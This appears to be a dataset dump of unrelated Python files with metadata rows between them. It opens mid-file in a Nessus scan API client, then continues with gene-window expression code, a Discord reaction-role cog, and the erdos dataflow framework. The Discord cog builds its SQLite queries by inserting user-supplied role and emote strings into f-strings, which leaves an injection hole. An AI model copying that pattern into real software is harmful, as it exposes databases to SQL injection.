"""
Deletes a scan.
Scans in running, paused or stopping states can not be deleted.
:param scan: the soon-to-be-deleted
"""
url = 'scans/{}'.format(scan.id)
self._delete(url)
def launch(self, scan: NessusScan, alt_targets: Optional[Iterable[str]] = None) -> str:
"""
Launches a scan.
:param scan: the soon-to-be-launch
:param alt_targets: target to scan, if not given, default to the one set during scan creation
:return: uuid of the launched scan
"""
url = 'scans/{scan_id}/launch'.format(scan_id=scan.id)
json = alt_targets and {'alt_targets': alt_targets}
ans = self._post(url, json=json)
return ans.json()['scan_uuid']
def details(self, scan: NessusScan) -> NessusScanDetails:
url = 'scans/{scan_id}'.format(scan_id=scan.id)
ans = self._get(url)
return NessusScanDetails.from_json(ans.json())
def host_details(self, scan: NessusScan, host: NessusScanHost) -> NessusScanHostDetails:
url = 'scans/{scan_id}/hosts/{host_id}'.format(scan_id=scan.id, host_id=host.host_id)
ans = self._get(url)
return NessusScanHostDetails.from_json(ans.json())
def plugin_output(self, scan: NessusScan, host: NessusScanHost, plugin_id: int) -> NessusScanPluginOutputDetails:
url = 'scans/{scan_id}/hosts/{host_id}/plugins/{plugin_id}'.format(scan_id=scan.id, host_id=host.host_id,
plugin_id=plugin_id)
ans = self._get(url)
return NessusScanPluginOutputDetails.from_json(ans.json())
| 41.970464 | 120 | 0.663894 | 4,298 | 39,788 | 5.905537 | 0.085621 | 0.064298 | 0.024703 | 0.022063 | 0.310299 | 0.237452 | 0.196793 | 0.169963 | 0.160586 | 0.158577 | 0 | 0.000462 | 0.238238 | 39,788 | 947 | 121 | 42.014784 | 0.836979 | 0.068111 | 0 | 0.290087 | 0 | 0 | 0.08506 | 0.026309 | 0 | 0 | 0 | 0.002112 | 0 | 1 | 0.091837 | false | 0 | 0.01312 | 0.002915 | 0.287172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a06f10c100f3cd38eb1a9e5dbb23f8546f5139 | 10,444 | py | Python | panopticon/wme.py | scyrusm/panopticon | bb28deffb97fd7c983a5abb8c2626c24d9f25e48 | [
"BSD-3-Clause"
] | 3 | 2021-01-14T13:38:32.000Z | 2021-09-07T12:18:48.000Z | panopticon/wme.py | scyrusm/panopticon | bb28deffb97fd7c983a5abb8c2626c24d9f25e48 | [
"BSD-3-Clause"
] | null | null | null | panopticon/wme.py | scyrusm/panopticon | bb28deffb97fd7c983a5abb8c2626c24d9f25e48 | [
"BSD-3-Clause"
] | 2 | 2020-12-22T03:15:27.000Z | 2020-12-22T03:16:50.000Z | """
wme.py
====================================
wme
"""
# second version
import numpy as np
from tqdm import tqdm
import pandas as pd
from scipy import stats
from itertools import islice
from scipy.sparse import coo_matrix, save_npz
from panopticon.utilities import get_valid_gene_info
def get_list_of_gene_windows(genes, window_size=400, window_step=50, release=102, species='homo sapiens'):
"""
Parameters
----------
genes :
param window_size: (Default value = 200)
window_step :
Default value = 1)
window_size :
(Default value = 200)
Returns
-------
"""
gene_names, gene_contigs, gene_starts, gene_ends = get_valid_gene_info(genes, release=release, species=species)
gene_df = pd.DataFrame(gene_names)
gene_df.columns = ['name']
gene_df['contig'] = gene_contigs
gene_df['start'] = gene_starts
gene_df['end'] = gene_ends
gene_df_groupby = gene_df.set_index('name').sort_values('start').groupby(
'contig')
list_of_gene_windows = []
for chromosome in gene_df['contig'].unique():
list_of_gene_windows += [
list(gene_df_groupby.groups[chromosome])[i:(i + window_size)]
for i in np.arange(
0,
len(gene_df_groupby.groups[chromosome]) - window_size +
1, window_step)
]
return list_of_gene_windows
def robust_mean_windowed_expressions(genes,
list_of_gene_windows,
expression_data,
upper_cut=5,
windsor=False,
tqdm_desc=''):
"""
Produces an arithmetic mean over expression in windows determined by list_of_gene_windows. Highest-expression genes in each window are discarded.
Can be made more memory-friendly, by implementing a map function over expression_data--I still haven't done this. S Markson 4 June 2020.
Parameters
----------
genes :
param list_of_gene_windows:
expression_data :
param upper_cut: (Default value = 0)
windsor :
Default value = False)
tqdm_desc :
Default value = '')
list_of_gene_windows :
upper_cut :
(Default value = 5)
Returns
-------
"""
gene_to_index = {gene: i for i, gene in enumerate(genes)}
mean_window_expressions = np.zeros((len(list_of_gene_windows),
expression_data.shape[1]))
with tqdm(total=len(list_of_gene_windows), desc=tqdm_desc) as pbar:
for i, window in enumerate(list_of_gene_windows):
window_expression_indices = np.array(
[gene_to_index[gene] for gene in window])
exprs = expression_data[window_expression_indices, :]
robust_cell_means = np.zeros(exprs.shape[1])
for icell in range(exprs.shape[1]):
cell_exprs = exprs[:, icell]
truncated = np.sort(cell_exprs)[::-1][upper_cut::]
if windsor:
robust_cell_means[icell] = np.hstack(
([truncated[0]] * upper_cut, truncated)).mean()
else:
robust_cell_means[icell] = truncated.mean()
mean_window_expressions[i, :] = robust_cell_means
pbar.update(1)
return mean_window_expressions
def get_windowed_mean_expression(loom,
list_of_gene_windows,
patient_column='Patient_ID',
patient=0,
cell_type_column=None,
cell_type=None,
complexity_column='nGene',
complexity_cutoff=0,
upper_cut=5,
log2=False):
"""
THIS IS DEPRECATED--S. Markson 4 June 2020
Parameters
----------
genes :
param metadata:
expression_data :
param list_of_gene_windows:
patient :
param cell_type: (Default value = 'tumor')
complexity_cutoff :
Default value = 1000)
cell_type_col_name :
Default value = 'cell.type')
patient_col_name :
Default value = 'patient_ID')
complexity_col_name :
Default value = 'nGene')
metadata :
list_of_gene_windows :
cell_type :
(Default value = 'tumor')
patient_columns :
(Default value = 'Patient_ID')
cell_type_column :
(Default value = 'cell.type')
Returns
-------
"""
# Nota bene: patient id gets cast to string below
genes = loom.ra['gene']
# This is very inefficient--make a general function for loom copy-over
metadata = pd.DataFrame(loom.ca['patient_ID'])
metadata.columns = ['patient_ID']
metadata['complexity'] = loom.ca['complexity']
metadata['cell_type'] = loom.ca['cell_type']
# metadata['cell_name'] = loom.ca['cell_names'] # I hate this
if complexity_cutoff > 0:
metadata = metadata[metadata[complexity_column]>complexity_cutoff]
if type(patient) not in [tuple, list]:
patient = [str(patient)]
else:
patient = list(patient)
patient = [str(x) for x in patient]
print("debug", patient)
if cell_type_column==None and cell_type == None:
relevant_indices = metadata[(metadata[patient_column].astype(str).isin(patient)) ].index.values
else:
relevant_indices = metadata[(metadata[cell_type_column].astype(str) == str(cell_type))
& (metadata[patient_column].astype(str).isin(patient))].index.values
if log2:
relevant_expression_data = 2**loom[:, relevant_indices] - 1
else:
relevant_expression_data = loom[:, relevant_indices]
mean_window_expressions = robust_mean_windowed_expressions(
genes,
list_of_gene_windows,
relevant_expression_data,
tqdm_desc='Calculating Mean Window Expressions, with "Robustification"',
upper_cut=upper_cut
)
return mean_window_expressions, metadata.loc[relevant_indices]
def get_ranks(mean_window_expressions):
"""
Parameters
----------
mean_window_expressions :
Returns
-------
"""
mean_window_expression_ranks = np.zeros(mean_window_expressions.shape)
for icell in range(mean_window_expressions.shape[1]):
mean_window_expression_ranks[:, icell] = stats.rankdata(
mean_window_expressions[:, icell])
return mean_window_expression_ranks
def convert_to_sparse(dense_file, sparse_file=None, genes_not_present=False, genelist_file=None, delimiter='\t'):
"""
Parameters
----------
dense_file :
sparse_file :
(Default value = None)
genelist_file :
(Default value = None)
delimiter :
(Default value = '\t')
Returns
-------
"""
N = 20
iterator = 0
row = []
col = []
data = []
genes = []
with open(dense_file, 'r') as infile:
firstline = islice(infile, 1)
headings = np.genfromtxt(firstline, dtype=None)
with tqdm(
unit=' rows completed',
unit_scale=True,
unit_divisor=1024,
desc='Converting dense matrix to sparse: ') as pbar:
while True:
gen = islice(infile, N)
chunk = np.genfromtxt(gen, dtype=str, delimiter=delimiter)
if genes_not_present:
expressions = chunk.astype(float)
else:
genes += list(chunk[:, 0])
expressions = chunk[:, 1::].astype(float)
#print(chunk)
x, y = np.where(expressions > 0)
for i, j in zip(x, y):
row.append(i + iterator)
col.append(j)
data.append(expressions[i, j])
if chunk.shape[0] < N:
iterator += chunk.shape[0]
break
else:
iterator += N
pbar.update(N)
expr_mat = coo_matrix((data, (row, col)), shape=(iterator, len(headings)))
if sparse_file:
save_npz(sparse_file, expr_mat)
if genelist_file and not genes_not_present:
np.savetxt(genelist_file,np.array(genes),delimiter=',',fmt='%s')
return expr_mat, genes
def get_masked_wme(loom, layername, mask=None, gene_ra='gene',species='homo sapiens', release=102, window_step=50, window_size=50, return_principal_components=None, upper_cut=0, mask_option='load_full'):
from panopticon.wme import get_list_of_gene_windows, robust_mean_windowed_expressions
from tqdm import tqdm
gene_windows = get_list_of_gene_windows(loom.ra[gene_ra], species=species, window_step=window_step, window_size=window_size, release=release)
if mask is None:
X = loom[layername][:,:]
else:
if mask_option == 'load_full': # this is to address an h5py performance bog
X = loom[layername][:,:][:,mask]
elif mask_option == 'mask_first':
X = loom[layername][:,mask]
#if mask_option not in ['load_full','mask_first','scan']:
else:
raise Exception("mask_option must be one of: load_full, mask_first, scan")
if mask_option == 'scan':
mwe_parts = []
for (ix, selection, view) in loom.scan(items=mask, axis=1):
mwe_parts.append(robust_mean_windowed_expressions(view.ra[gene_ra],
gene_windows,
view[layername][:,:],
upper_cut=upper_cut, ).T)
mwe = np.vstack(mwe_parts).T
else:
mwe = robust_mean_windowed_expressions(loom.ra[gene_ra],
gene_windows,
X,
upper_cut=upper_cut, )
if return_principal_components is not None:
if type(return_principal_components)!=int:
raise Exception("type of return_principal_components must be None or int")
from sklearn.decomposition import PCA
pca = PCA(n_components=return_principal_components)
return pca.fit_transform(mwe.T)
else:
return mwe.T
| 33.155556 | 203 | 0.578514 | 1,186 | 10,444 | 4.840641 | 0.215008 | 0.038321 | 0.029612 | 0.05034 | 0.127156 | 0.06201 | 0.048772 | 0.048772 | 0.035882 | 0 | 0 | 0.010108 | 0.317982 | 10,444 | 314 | 204 | 33.261147 | 0.795873 | 0.188051 | 0 | 0.110465 | 0 | 0 | 0.050192 | 0.003338 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034884 | false | 0 | 0.05814 | 0 | 0.133721 | 0.005814 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a106d05012e4ff5dbc04ccdc03a0e70f7b8fee | 4,669 | py | Python | cogs/rr.py | D3monEmper0r/CA-Discord-Bot | 1d38e00582cd0ea84af72a39daedc963256fd57a | [
"MIT"
] | null | null | null | cogs/rr.py | D3monEmper0r/CA-Discord-Bot | 1d38e00582cd0ea84af72a39daedc963256fd57a | [
"MIT"
] | 1 | 2021-03-26T15:41:07.000Z | 2021-03-26T15:41:07.000Z | cogs/rr.py | D3monEmper0r/CA-Discord-Bot | 1d38e00582cd0ea84af72a39daedc963256fd57a | [
"MIT"
] | null | null | null | ##### Imports #####
import discord
import sqlite3
from .__init__ import c
from discord.ext import commands
def create(db):
conn = sqlite3.connect(db)
c = conn.cursor()
newDbTable = """CREATE TABLE IF NOT EXISTS
reactionRole(role TEXT PRIMARY KEY, emote TEXT UNIQUE)"""
c.execute(newDbTable)
conn.commit()
conn.close()
def fill(db, role, emote):
conn = sqlite3.connect(db)
c = conn.cursor()
c.execute(f'INSERT INTO reactionRole VALUES ("{role}", "{emote}")')
conn.commit()
conn.close()
def delete(db, role):
conn = sqlite3.connect(db)
c = conn.cursor()
c.execute(f'DELETE FROM reactionRole WHERE role = "{role}"')
conn.commit()
conn.close()
def data(db):
conn = sqlite3.connect(db)
c = conn.cursor()
c.execute(f'SELECT * FROM reactionRole')
result = c.fetchall()
conn.close()
return(result)
def search(db, emote):
conn = sqlite3.connect(db)
c = conn.cursor()
c.execute(f'SELECT * FROM reactionRole WHERE emote = "{emote}"')
result = c.fetchall()
conn.close()
return(result)
class ReactRole(commands.Cog):
##### Initalization #####
def __init__(self, client):
self.client = client
##### events #####
@commands.Cog.listener()
async def on_raw_reaction_add(self, payload):
reactUser = payload.member
g = self.client.get_guild(c.serverId)
emoji = payload.emoji
tmp = search(c.DB, emoji)[0][0]
for role in await g.fetch_roles():
if role.mention == tmp:
r = role
if r != None and payload.channel_id == c.reactRoleId:
if reactUser != self.client.user:
await reactUser.add_roles(r)
@commands.Cog.listener()
async def on_raw_reaction_remove(self, payload):
reactUser = discord.utils.get(self.client.get_all_members(), id=payload.user_id)
g = self.client.get_guild(c.serverId)
emoji = payload.emoji
tmp = search(c.DB, emoji)[0][0]
for role in await g.fetch_roles():
if role.mention == tmp:
r = role
if r != None and payload.channel_id == c.reactRoleId:
if reactUser != self.client.user:
await reactUser.remove_roles(r)
##### commands #####
@commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
@commands.command()
async def rrCreate(self, ctx):
create(c.DB)
await ctx.channel.purge(limit = 1)
embed = discord.Embed(title='React to give yourself a role.', description='', color=0xa0089b)
await ctx.send(embed=embed)
@commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
@commands.command()
async def rrAdd(self, ctx, *, reactRole):
await ctx.channel.purge(limit = 1)
g = self.client.get_guild(c.serverId)
role = reactRole.split(' ')[0]
emoji = reactRole.split(' ')[1]
fill(c.DB, role, emoji)
@commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
@commands.command()
async def rrUpdate(self, ctx):
await ctx.channel.purge(limit = 1)
channel = await self.client.fetch_channel(c.reactRoleId)
message = await channel.fetch_message(c.reactMsgId)
desc = ''
for item in data(c.DB):
desc += item[0] + ': ' + item[1] + '\n'
embed = discord.Embed(title='React to give yourself a role.', description=desc, color=0xa0089b)
await message.edit(embed=embed)
await message.clear_reactions()
for item in data(c.DB):
await message.add_reaction(item[1])
@commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
@commands.command()
async def rrRemove(self, ctx, role):
await ctx.channel.purge(limit = 1)
g = self.client.get_guild(c.serverId)
delete(c.DB, role)
@commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
@commands.command(aliases=['e'])
async def get_e(self, ctx):
g = self.client.get_guild(c.serverId)
for e in await g.fetch_emojis():
await ctx.send(e)
@commands.has_any_role('Café Antik Geschäftsführung', 'Jonnys Bot test')
@commands.command(aliases=['r'])
async def get_r(self, ctx, role):
g = self.client.get_guild(c.serverId)
print(role)
for r in await g.fetch_roles():
print('CA role: ', r.mention)
if r.mention == role:
await ctx.send(r.id)
##### Finalize and run #####
def setup(client):
client.add_cog(ReactRole(client)) | 31.126667 | 103 | 0.610409 | 603 | 4,669 | 4.643449 | 0.212272 | 0.042857 | 0.0325 | 0.03 | 0.604643 | 0.574643 | 0.544643 | 0.498929 | 0.457857 | 0.457857 | 0 | 0.008331 | 0.254444 | 4,669 | 150 | 104 | 31.126667 | 0.796036 | 0.012422 | 0 | 0.512821 | 0 | 0 | 0.12928 | 0 | 0 | 0 | 0.003512 | 0 | 0 | 1 | 0.059829 | false | 0 | 0.034188 | 0 | 0.102564 | 0.017094 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41a3c225eedd6acf9dfa7630da6b90b21ff018d4 | 18,539 | py | Python | python/erdos/__init__.py | objorkman/erdos | 13b3be477d6674e9e377a56dec484f80ba41e915 | [
"Apache-2.0"
] | null | null | null | python/erdos/__init__.py | objorkman/erdos | 13b3be477d6674e9e377a56dec484f80ba41e915 | [
"Apache-2.0"
] | null | null | null | python/erdos/__init__.py | objorkman/erdos | 13b3be477d6674e9e377a56dec484f80ba41e915 | [
"Apache-2.0"
] | null | null | null | import logging
import multiprocessing as mp
import signal
import sys
from functools import wraps
from typing import Optional, Tuple, Type
import erdos.context
import erdos.internal as _internal
import erdos.operator
import erdos.utils
from erdos.message import Message, WatermarkMessage
from erdos.profile import Profile
from erdos.streams import (
ExtractStream,
IngestStream,
LoopStream,
OperatorStream,
ReadStream,
Stream,
WriteStream,
)
from erdos.timestamp import Timestamp
_num_py_operators = 0
# Set the top-level logger for ERDOS logging.
# Users can change the logging level to the required level by calling setLevel
# erdos.logger.setLevel(logging.DEBUG)
FORMAT = "%(asctime)s.%(msecs)03d %(name)s %(levelname)s: %(message)s"
DATE_FORMAT = "%Y-%m-%d,%H:%M:%S"
formatter = logging.Formatter(FORMAT, datefmt=DATE_FORMAT)
default_handler = logging.StreamHandler(sys.stderr)
default_handler.setFormatter(formatter)
logger = logging.getLogger(__name__)
logger.addHandler(default_handler)
logger.setLevel(logging.WARNING)
logger.propagate = False
def connect_source(
op_type: Type[erdos.operator.Source],
config: erdos.operator.OperatorConfig,
*args,
**kwargs,
) -> OperatorStream:
"""Registers a :py:class:`.Source` operator to the dataflow
graph, and returns the :py:class:`OperatorStream` that the operator will
write the data on.
Args:
op_type: The :py:class:`.Source` operator that needs to
be added to the graph.
config: Configuration details required by the operator.
*args: Arguments passed to the operator during initialization.
**kwargs: Keyword arguments passed to the operator during
initialization.
Returns:
An :py:class:`OperatorStream` corresponding to the
:py:class:`WriteStream` made available to :py:meth:`.Source.run`.
"""
if not issubclass(op_type, erdos.operator.Source):
raise TypeError("{} must subclass erdos.operator.Source".format(op_type))
if op_type.run.__code__.co_code == erdos.operator.Source.run.__code__.co_code:
logger.warn(
"The operator {} does not " "implement the `run` method.".format(op_type)
)
# 1-index operators because node 0 is preserved for the current process,
# and each node can only run 1 python operator.
global _num_py_operators
_num_py_operators += 1
node_id = _num_py_operators
logger.debug(
"Connecting operator #{num} ({name}) to the graph.".format(
num=node_id, name=config.name
)
)
internal_stream = _internal.connect_source(op_type, config, args, kwargs, node_id)
return OperatorStream(internal_stream)
def connect_sink(
op_type: Type[erdos.operator.Sink],
config: erdos.operator.OperatorConfig,
read_stream: Stream,
*args,
**kwargs,
):
"""Registers a :py:class:`.Sink` operator to the dataflow
graph.
Args:
op_type: The :py:class:`.Sink` operator that needs to
be added to the graph.
config: Configuration details required by the operator.
read_stream: The :py:class:`Stream` instance from where the operator
reads its data.
*args: Arguments passed to the operator during initialization.
**kwargs: Keyword arguments passed to the operator during
initialization.
"""
if not issubclass(op_type, erdos.operator.Sink):
raise TypeError("{} must subclass erdos.operator.Sink".format(op_type))
if not isinstance(read_stream, Stream):
raise TypeError("{} must subclass `Stream`.".format(read_stream))
if (
op_type.run.__code__.co_code == erdos.operator.Sink.run.__code__.co_code
and op_type.on_data.__code__.co_code
== erdos.operator.Sink.on_data.__code__.co_code
and op_type.on_watermark.__code__.co_code
== erdos.operator.Sink.on_watermark.__code__.co_code
):
logger.warn(
"The operator {} does not implement any of the "
"`run`, `on_data` or `on_watermark` methods.".format(op_type)
)
# 1-index operators because node 0 is preserved for the current process,
# and each node can only run 1 python operator.
global _num_py_operators
_num_py_operators += 1
node_id = _num_py_operators
logger.debug(
"Connecting operator #{num} ({name}) to the graph.".format(
num=node_id, name=config.name
)
)
_internal.connect_sink(
op_type, config, read_stream._internal_stream, args, kwargs, node_id
)
def connect_one_in_one_out(
op_type: Type[erdos.operator.OneInOneOut],
config: erdos.operator.OperatorConfig,
read_stream: Stream,
*args,
**kwargs,
) -> OperatorStream:
"""Registers a :py:class:`.OneInOneOut` operator to the dataflow graph that
receives input from the given :code:`read_stream`, and returns the
:py:class:`OperatorStream` that the operator will write the data on.
Args:
op_type: The :py:class:`.OneInOneOut` operator that needs to be added
to the graph.
config: Configuration details required by the operator.
read_stream: The :py:class:`Stream` instance from where the operator
reads its data.
*args: Arguments passed to the operator during initialization.
**kwargs: Keyword arguments passed to the operator during
initialization.
Returns:
An :py:class:`OperatorStream` corresponding to the
:py:class:`WriteStream` made available to :py:meth:`.OneInOneOut.run`,
or to the operator's callbacks via the
:py:class:`.OneInOneOutContext`.
"""
if not issubclass(op_type, erdos.operator.OneInOneOut):
raise TypeError("{} must subclass erdos.operator.OneInOneOut".format(op_type))
if not isinstance(read_stream, Stream):
raise TypeError("{} must subclass `Stream`.".format(read_stream))
if (
op_type.run.__code__.co_code == erdos.operator.OneInOneOut.run.__code__.co_code
and op_type.on_data.__code__.co_code
== erdos.operator.OneInOneOut.on_data.__code__.co_code
and op_type.on_watermark.__code__.co_code
== erdos.operator.OneInOneOut.on_watermark.__code__.co_code
):
logger.warn(
"The operator {} does not implement any of the "
"`run`, `on_data` or `on_watermark` methods.".format(op_type)
)
# 1-index operators because node 0 is preserved for the current process,
# and each node can only run 1 python operator.
global _num_py_operators
_num_py_operators += 1
node_id = _num_py_operators
logger.debug(
"Connecting operator #{num} ({name}) to the graph.".format(
num=node_id, name=config.name
)
)
internal_stream = _internal.connect_one_in_one_out(
op_type, config, read_stream._internal_stream, args, kwargs, node_id
)
return OperatorStream(internal_stream)
def connect_two_in_one_out(
op_type: Type[erdos.operator.TwoInOneOut],
config: erdos.operator.OperatorConfig,
left_read_stream: Stream,
right_read_stream: Stream,
*args,
**kwargs,
) -> OperatorStream:
"""Registers a :py:class:`.TwoInOneOut` operator to the
dataflow graph that receives input from the given :code:`left_read_stream`
and :code:`right_read_stream`, and returns the :py:class:`OperatorStream`
that the operator sends messages on.
Args:
op_type: The :py:class:`.TwoInOneOut` operator to add
to the graph.
config: Configuration details required by the operator.
left_read_stream: The first :py:class:`Stream` instance from where the
operator reads its data.
right_read_stream: The second :py:class:`Stream` instance from where
the operator reads its data.
*args: Arguments passed to the operator during initialization.
**kwargs: Keyword arguments passed to the operator during
initialization.
Returns:
An :py:class:`OperatorStream` corresponding to the
:py:class:`WriteStream` made available to :py:meth:`.TwoInOneOut.run`,
or to the operator's callbacks via the
:py:class:`.TwoInOneOutContext`.
"""
if not issubclass(op_type, erdos.operator.TwoInOneOut):
raise TypeError("{} must subclass erdos.operator.TwoInOneOut".format(op_type))
if not isinstance(left_read_stream, Stream):
raise TypeError("{} must subclass `Stream`.".format(left_read_stream))
if not isinstance(right_read_stream, Stream):
raise TypeError("{} must subclass `Stream`.".format(right_read_stream))
if (
op_type.run.__code__.co_code == erdos.operator.TwoInOneOut.run.__code__.co_code
and op_type.on_left_data.__code__.co_code
== erdos.operator.TwoInOneOut.on_left_data.__code__.co_code
and op_type.on_right_data.__code__.co_code
== erdos.operator.TwoInOneOut.on_right_data.__code__.co_code
and op_type.on_watermark.__code__.co_code
== erdos.operator.TwoInOneOut.on_watermark.__code__.co_code
):
logger.warn(
"The operator {} does not implement any of the `run`, "
"`on_left_data`, `on_right_data` or `on_watermark` "
"methods.".format(op_type)
)
# 1-index operators because node 0 is preserved for the current process,
# and each node can only run 1 python operator.
global _num_py_operators
_num_py_operators += 1
node_id = _num_py_operators
logger.debug(
"Connecting operator #{num} ({name}) to the graph.".format(
num=node_id, name=config.name
)
)
internal_stream = _internal.connect_two_in_one_out(
op_type,
config,
left_read_stream._internal_stream,
right_read_stream._internal_stream,
args,
kwargs,
node_id,
)
return OperatorStream(internal_stream)
def connect_one_in_two_out(
op_type: Type[erdos.operator.OneInTwoOut],
config: erdos.operator.OperatorConfig,
read_stream: Stream,
*args,
**kwargs,
) -> Tuple[OperatorStream, OperatorStream]:
"""Registers a :py:class:`.OneInTwoOut` operator to the dataflow graph that
receives input from the given :code:`read_stream`, and returns the pair of
:py:class:`OperatorStream` instances that the operator will write data on.
Args:
op_type: The :py:class:`.OneInTwoOut` operator that needs to be added
to the graph.
config: Configuration details required by the operator.
read_stream: The :py:class:`Stream` instance from where the
operator reads its data.
*args: Arguments passed to the operator during initialization.
**kwargs: Keyword arguments passed to the operator during
initialization.
Returns:
A pair of :py:class:`OperatorStream` instances corresponding to the
:py:class:`WriteStream` instances made available to
:py:meth:`.OneInOneOut.run`, or to the operator's callbacks via the
:py:class:`.OneInTwoOutContext`.
"""
if not issubclass(op_type, erdos.operator.OneInTwoOut):
raise TypeError("{} must subclass erdos.operator.OneInTwoOut".format(op_type))
if not isinstance(read_stream, Stream):
raise TypeError("{} must subclass `Stream`.".format(read_stream))
if (
op_type.run.__code__.co_code == erdos.operator.OneInTwoOut.run.__code__.co_code
and op_type.on_data.__code__.co_code
== erdos.operator.OneInTwoOut.on_data.__code__.co_code
and op_type.on_watermark.__code__.co_code
== erdos.operator.OneInTwoOut.on_watermark.__code__.co_code
):
logger.warn(
"The operator {} does not implement any of the "
"`run`, `on_data` or `on_watermark` methods.".format(op_type)
)
# 1-index operators because node 0 is preserved for the current process,
# and each node can only run 1 python operator.
global _num_py_operators
_num_py_operators += 1
node_id = _num_py_operators
logger.debug(
"Connecting operator #{num} ({name}) to the graph.".format(
num=node_id, name=config.name
)
)
left_stream, right_stream = _internal.connect_one_in_two_out(
op_type, config, read_stream._internal_stream, args, kwargs, node_id
)
return OperatorStream(left_stream), OperatorStream(right_stream)
def reset():
"""Create a new dataflow graph.
Note:
A call to this function renders the previous dataflow graph unsafe to
use.
"""
logger.info("Resetting the default graph.")
global _num_py_operators
_num_py_operators = 0
_internal.reset()
# TODO (Sukrit) : Should this be called a GraphHandle?
# What is the significance of the "Node" here?
class NodeHandle:
"""A handle to the dataflow graph returned by the :py:func:`run_async`
function.
The handle exposes functions to :py:func:`shutdown` the dataflow, or
:py:func:`wait` for its completion.
Note:
This structure should not be initialized by the users.
"""
def __init__(self, py_node_handle, processes):
self.py_node_handle = py_node_handle
self.processes = processes
def shutdown(self):
"""Shuts down the dataflow."""
logger.info("Shutting down other processes")
for p in self.processes:
p.terminate()
p.join()
logger.info("Shutting down node.")
self.py_node_handle.shutdown_node()
def wait(self):
"""Waits for the completion of all the operators in the dataflow"""
for p in self.processes:
p.join()
logger.debug("Finished waiting for the dataflow graph processes.")
def run(graph_filename: Optional[str] = None, start_port: Optional[int] = 9000):
"""Instantiates and runs the dataflow graph.
ERDOS will spawn 1 process for each python operator, and connect them via
TCP.
Args:
graph_filename: The filename to which to write the dataflow graph
as a DOT file.
start_port: The port on which to start. The start port is the
lowest port ERDOS will use to establish TCP connections between
operators.
"""
driver_handle = run_async(graph_filename, start_port)
logger.debug("Waiting for the dataflow to complete ...")
driver_handle.wait()
def _run_node(node_id, data_addresses, control_addresses):
_internal.run(node_id, data_addresses, control_addresses)
def run_async(
graph_filename: Optional[str] = None, start_port: Optional[int] = 9000
) -> NodeHandle:
"""Instantiates and runs the dataflow graph asynchronously.
ERDOS will spawn 1 process for each python operator, and connect them via
TCP.
Args:
graph_filename: The filename to which to write the dataflow graph
as a DOT file.
start_port: The port on which to start. The start port is the
lowest port ERDOS will use to establish TCP connections between
operators.
Returns:
A :py:class:`.NodeHandle` that allows the driver to interface with the
dataflow graph.
"""
data_addresses = [
"127.0.0.1:{port}".format(port=start_port + i)
for i in range(_num_py_operators + 1)
]
control_addresses = [
"127.0.0.1:{port}".format(port=start_port + len(data_addresses) + i)
for i in range(_num_py_operators + 1)
]
logger.debug("Running the dataflow graph on addresses: {}".format(data_addresses))
# Fix for macOS where mulitprocessing defaults
# to spawn() instead of fork() in Python 3.8+
# https://docs.python.org/3/library/multiprocessing.html#contexts-and-start-methods
# Warning: may lead to crashes
# https://bugs.python.org/issue33725
ctx = mp.get_context("fork")
processes = [
ctx.Process(target=_run_node, args=(i, data_addresses, control_addresses))
for i in range(1, _num_py_operators + 1)
]
# Needed to shut down child processes
def sigint_handler(sig, frame):
for p in processes:
p.terminate()
sys.exit(0)
signal.signal(signal.SIGINT, sigint_handler)
for p in processes:
p.start()
# The driver must always be on node 0 otherwise ingest and extract streams
# will break
py_node_handle = _internal.run_async(
0, data_addresses, control_addresses, graph_filename
)
return NodeHandle(py_node_handle, processes)
def profile(event_name, operator, event_data=None):
return Profile(event_name, operator, event_data)
def profile_method(**decorator_kwargs):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
if isinstance(args[0], erdos.operator.BaseOperator):
# The func is an operator method.
op_name = args[0].config.name
cb_name = func.__name__
if "event_name" in decorator_kwargs:
event_name = decorator_kwargs["event_name"]
else:
# Set the event name to the operator name and the callback
# name if it's not passed by the user.
event_name = op_name + "." + cb_name
timestamp = None
if len(args) > 1:
if isinstance(args[1], Timestamp):
# The func is a watermark callback.
timestamp = args[1]
elif isinstance(args[1], Message):
# The func is a callback.
timestamp = args[1].timestamp
else:
raise TypeError("@erdos.profile can only be used on operator methods")
with erdos.profile(
event_name, args[0], event_data={"timestamp": str(timestamp)}
):
return func(*args, **kwargs)
return wrapper
return decorator
__all__ = [
"Stream",
"ReadStream",
"WriteStream",
"LoopStream",
"IngestStream",
"ExtractStream",
"Profile",
"Message",
"WatermarkMessage",
"Timestamp",
"connect_source",
"connect_sink",
"connect_one_in_one_out",
"connect_two_in_one_out",
"connect_one_in_two_out",
"reset",
"run",
"run_async",
"profile_method",
"NodeHandle",
]
